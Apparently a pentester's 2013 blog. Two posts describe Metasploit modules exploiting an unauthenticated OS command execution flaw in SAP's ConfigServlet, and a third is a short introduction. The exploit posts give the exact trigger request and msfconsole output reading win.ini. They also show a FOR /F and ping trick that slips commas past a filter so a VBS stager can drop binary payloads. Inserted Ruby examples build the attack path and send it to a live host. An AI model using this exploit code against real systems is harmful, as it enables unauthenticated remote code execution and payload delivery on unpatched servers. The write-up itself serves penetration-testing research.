Wednesday, April 24, 2013

SAP ConfigServlet remote code execution metasploit module

Still SAP, still the same OS command execution vulnerability I described in my previous post. So what is the difference? Being able to run OS commands on the target system is good, but you probably want something more: binary payloads.

After finishing my SAP ConfigServlet OS Command Execution metasploit module, I started on a new module for remote code execution.

Because the ConfigServlet executes OS commands, it is relatively easy to deliver binary payloads and run them through metasploit's command stagers. A command stager converts the binary payload to an ASCII-safe representation (base64 here), uses OS commands such as echo to write out the payload and a small decoder stager line by line, and finally executes the payload through the dropped stager. Because VBScript is available on far more Windows installations than PowerShell, I chose CmdStagerVBS.

I wrote a draft module and started testing it. Everything looked fine, but the exploitation failed. After analysing the dropped files I realised that the payload file was intact, but the stager VBS file had problems with both its content and its size.

The stager template is the data/exploits/cmdstager/vbs_b64 file in the metasploit tree. Testing the requests showed that the comma is a bad character in the HTTP request to the ConfigServlet, so it cannot be sent directly, yet it is needed to build the stager file, which contains several:
$ cat vbs_b64 | grep -n ","
4:echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
6:echo data = Replace(data, vbCrLf, "") >>decode_stub
9:echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("DECODED", 2, True) >>decode_stub
13:echo "DECODED", 0, false >>decode_stub
18:echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
20:echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
21:echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
22:echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
23:echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
38:echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
Fortunately, the payload file was not affected: it contains only the base64 encoded payload, and the base64 alphabet (A-Z, a-z, 0-9, +, / and the = padding) has no comma. So how can commas be written out through OS command execution without using them? On Linux this is easy, because you have plenty of scripting languages and tools to choose from, but on Windows it is not trivial.

With the "FOR" command it is possible to pick tokens out of the right places of another command's output (thanks to my colleague Laszlo Toth who helped me figure this out) and put them into a variable that can later be used in an "echo" command. So if there is a command whose output contains a comma, that comma can be echoed without ever appearing in the HTTP request. For a reliable solution I had to find a command that behaves the same way on every Windows version, places the comma at the same position in its output, and does so independently of the system language.

Look at the output of the ping command:
C:\Users\andrew>ping -n 1

Pinging with 32 bytes of data:
Reply from bytes=32 time<1ms TTL=128

Ping statistics for
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
In the statistics part of the output there is a comma right after the closing bracket of the loss figure, and it is there in every language version! Perfect!

Putting it all together, the following command line trick echoes a comma without one ever appearing in the command: findstr keeps only the statistics line containing a closing bracket, FOR /F splits that line at the bracket (delims=)), and tokens=2 selects what follows it, which is exactly the comma. Note that the single-percent form %i is correct here because the command runs via cmd /c; inside a batch file it would have to be %%i.
C:\Users\andrew>FOR /F "usebackq tokens=2 delims=)" %i IN (`"ping -n 1| findstr )"`) DO @echo comma: %i
comma: ,
I made the necessary improvements in my module to handle the stager lines that contain commas, and it just worked like a charm:
# Only the lines that build the VBS stager contain commas; wrap each of them in
# the FOR /F trick so the comma is produced on the target instead of being sent.
if command.include?(".vbs") and command.include?(",")
    command.gsub!(",", "%i")
    command = "cmd /c FOR /F \"usebackq tokens=2 delims=)\" %i IN (\`\"ping -n 1| findstr )\"\`) DO " + command
end
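As an added example (my own Ruby, not code from the module or the post), the following emulates the FOR /F comma trick on a constructed ping output and applies the same rewriting to a stager line, so you can check offline that the command line going into the request is comma free and that cmd would expand %i back into the original line. It assumes 127.0.0.1 as the ping target, because the host does not appear in the post's command line, and the ping output is a constructed English-locale sample.

```ruby
# Added example, not the module's code: emulate the FOR /F comma trick from
# the post on a constructed ping output, and apply the same rewriting to a
# stager line so the result can be checked offline.

# Assumption: the post's command line does not show the ping target, so the
# example pings loopback.
PING_HOST = "127.0.0.1"

# Constructed sample of `ping -n 1 127.0.0.1` on an English Windows; only the
# statistics line matters, and its "(0% loss)," tail is what the trick harvests.
SAMPLE_PING_OUTPUT = <<~PING
  Pinging 127.0.0.1 with 32 bytes of data:
  Reply from 127.0.0.1: bytes=32 time<1ms TTL=128

  Ping statistics for 127.0.0.1:
      Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
  Approximate round trip times in milli-seconds:
      Minimum = 0ms, Maximum = 0ms, Average = 0ms
PING

# Emulate `... | findstr needle`: keep only the lines containing the needle.
def findstr(output, needle)
  output.lines.map(&:chomp).select { |line| line.include?(needle) }
end

# Emulate FOR /F "tokens=N delims=D": split each line on the delimiter
# characters, collapse runs of delimiters (as cmd does) and return the Nth
# field of every line that has one.  Empty lines and lines starting with the
# default eol character ';' are skipped, again as cmd does.
def for_f_token(lines, token:, delims:)
  lines.filter_map do |line|
    next if line.empty? || line.start_with?(";")
    fields = line.split(/[#{Regexp.escape(delims)}]/).reject(&:empty?)
    fields[token - 1]
  end
end

# The value cmd would put into %i: the text after the ")" on the statistics
# line, which is just the comma.
def harvested_comma(ping_output = SAMPLE_PING_OUTPUT)
  for_f_token(findstr(ping_output, ")"), token: 2, delims: ")").first
end

# The FOR /F wrapper from the post.  %i (single percent) is right because the
# line is run via `cmd /c`; inside a .bat file it would have to be %%i.
def for_prefix(ping_host = PING_HOST)
  'cmd /c FOR /F "usebackq tokens=2 delims=)" %i IN (`"ping -n 1 ' + ping_host +
    '| findstr )"`) DO '
end

# Rewrite one stager line so that no comma reaches the HTTP request: every
# comma becomes %i and the line runs inside the FOR /F wrapper.  Lines without
# commas are passed through untouched, as in the module.
def avoid_commas(command, ping_host = PING_HOST)
  return command unless command.include?(",")
  for_prefix(ping_host) + command.gsub(",", "%i")
end

# Sanity check on what would be sent: the bad character must be gone.
def comma_free?(command)
  !command.include?(",")
end

# What cmd would finally execute for a rewritten line: strip the wrapper and
# expand %i with the harvested comma.  For a correct rewrite this gives back
# the original stager line.
def expand_for_variable(rewritten, ping_host = PING_HOST, ping_output = SAMPLE_PING_OUTPUT)
  body = rewritten.delete_prefix(for_prefix(ping_host))
  body.gsub("%i", harvested_comma(ping_output))
end

if __FILE__ == $PROGRAM_NAME
  line = 'echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub'
  sent = avoid_commas(line)
  puts sent
  puts "comma free: #{comma_free?(sent)}"
  puts "cmd would run: #{expand_for_variable(sent)}"
end
```

The emulation only models the tokenising that the trick relies on; it does not parse cmd syntax, so it says nothing about other characters in a stager line that the target's shell or the servlet might mishandle. The real check remains what the post describes: inspect the dropped files on the target.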
In the end, with my SAP ConfigServlet Remote Code Execution module it is possible to deliver and execute binary metasploit payloads as well as custom binaries.

Check the updates section in this post to access the code and to follow the life of my module.


Sunday, April 21, 2013

SAP ConfigServlet OS command execution metasploit module

If you have ever searched for SAP vulnerabilities, I am sure you have come across the ERPScan team's excellent research. This was the case in our current pentest project as well: a colleague of mine identified several SAP systems in the target network range, and we tried to find well known vulnerabilities affecting them.

We found a great presentation, Breaking SAP Portal, from Hacker Halted 2012 by Dmitry Chastuchin of ERPScan. One of the slides contains a very interesting screenshot showing the exploitation of a simple, remote, unauthenticated OS command execution vulnerability: with a single GET request it is possible to execute OS commands on the remote system. I searched for existing exploit implementations for this vulnerability, but there were no public metasploit or other exploits available. Surprisingly, there were not even relevant search results for this vulnerability, so I decided to create a metasploit module for it.

The vulnerability exists in the /ctc/servlet/ConfigServlet servlet; with the proper parameters you can achieve OS command execution.

To trigger the vulnerability you only have to request something like this (note that the query string is not the usual key=value&key=value form: the directives are separated by semicolons, EXECUTE_CMD followed by the CMDLINE value):
GET /ctc/servlet/ConfigServlet?;EXECUTE_CMD;CMDLINE=whoami
The servlet happily executes the command from the CMDLINE parameter and passes its output into the generated HTTP response. Vendor patches exist for this vulnerability, but you know how frequently companies apply them, so you have a good chance of finding a vulnerable version and exploiting it successfully.

It was easy to implement this exploit in metasploit. You can see my module in action:
msf auxiliary(sap_configservlet_exec_noauth) > show options 

Module options (auxiliary/admin/sap/sap_configservlet_exec_noauth):

   Name       Current Setting                 Required  Description
   ----       ---------------                 --------  -----------
   CMD        cmd /c type c:\windows\win.ini  yes       The command to execute
   Proxies                                    no        Use a proxy chain
   RHOST                                      yes       The target address
   RPORT      50000                           yes       The target port
   TARGETURI  /ctc/servlet                    yes       Path to ConfigServlet
   VHOST                                      no        HTTP server virtual host

msf auxiliary(sap_configservlet_exec_noauth) > run

[*] - Sending remote command: cmd /c type c:\windows\win.ini
[+] - Exploited successfully - Command: cmd /c type c:\windows\win.ini - Output: TYPE=S
INFO_SHORT=     + Process created!
; for 16-bit app support
[mci extensions]

[*] Auxiliary module execution completed
msf auxiliary(sap_configservlet_exec_noauth) >
As you can see, the response starts with a short status header (TYPE=S and INFO_SHORT= ... Process created!), and everything after "Process created!" is the output of the executed command, in this case the first lines of win.ini. A module therefore has to strip that header to get the clean command output.
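As an added example (my own Ruby, not the module's code), here is request construction and response parsing for this servlet: the path follows the format shown above, a comma in the command is rejected up front because it is a bad character for this servlet (the finding from the RCE post above), and the command output is cut out after the "Process created!" marker, using a constructed response that mirrors the msfconsole output. The percent-encoding of the command, the helper names and the plain-HTTP assumption for the live call are mine, not something the page states.

```ruby
# Added example, not the module's code: build the ConfigServlet request line
# from the post and pull the command output out of the response.
require "net/http"

TARGET_URI = "/ctc/servlet"   # the module's default TARGETURI from the post
DEFAULT_PORT = 50000          # the module's default RPORT from the post
MARKER = "Process created!"   # end of the servlet's status header

# RFC 3986 unreserved bytes; everything else gets percent-encoded so spaces,
# slashes and backslashes survive the request line.  Assumption: the page does
# not say how the servlet decodes CMDLINE; a plain `whoami` is unchanged anyway.
UNRESERVED = (("A".."Z").to_a + ("a".."z").to_a + ("0".."9").to_a + %w[- . _ ~]).map(&:ord)

def percent_encode(str)
  str.each_byte.map { |b| UNRESERVED.include?(b) ? b.chr : format("%%%02X", b) }.join
end

# The query string is not key=value&key=value: the servlet takes
# semicolon-separated directives, so build the path by hand.
def request_path(cmd, target_uri = TARGET_URI)
  # The comma is a bad character for this servlet (the finding from the RCE
  # post above), so refuse it here instead of sending a request that fails.
  raise ArgumentError, "comma is a bad character for ConfigServlet" if cmd.include?(",")
  "#{target_uri.chomp('/')}/ConfigServlet?;EXECUTE_CMD;CMDLINE=#{percent_encode(cmd)}"
end

# A successful response starts with a short status header (TYPE=S,
# INFO_SHORT= ... Process created!); everything after the marker is the
# command's output.  Returns nil when the marker is missing, i.e. the target
# did not run the command.
def extract_output(body)
  _head, tail = body.split(MARKER, 2)
  return nil unless tail
  tail.sub(/\A\r?\n/, "")
end

def exploited?(body)
  !extract_output(body).nil?
end

# Constructed sample response mirroring the msfconsole output in the post.
SAMPLE_RESPONSE = "TYPE=S\nINFO_SHORT=     + Process created!\n" \
                  "; for 16-bit app support\n[mci extensions]\n"

# Live use, not exercised offline: one GET, then parse.  Assumption: the
# servlet is reached over plain HTTP on port 50000, as in the post.
def run_command(host, cmd, port: DEFAULT_PORT, target_uri: TARGET_URI)
  res = Net::HTTP.get_response(host, request_path(cmd, target_uri), port)
  extract_output(res.body)
end

if __FILE__ == $PROGRAM_NAME
  puts request_path("cmd /c type c:\\windows\\win.ini")
  puts extract_output(SAMPLE_RESPONSE)
end
```

Checking for the marker rather than for an HTTP 200 is the useful part: the servlet answers 200 either way, so the presence of "Process created!" is what distinguishes a command that actually ran from an error page or a patched system.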

Check the updates section in this post to access the code and to follow the life of my module.


Saturday, April 20, 2013

First post

Hi Folks,

During my career in IT security there have been plenty of interesting situations, developments and ideas that would have been worth sharing, but somehow I never started to write public articles. This is going to change, and that is why I have created this blog.

Hopefully I will have enough time to create posts and you will enjoy them.
Please feel free to contact me and send me any suggestions.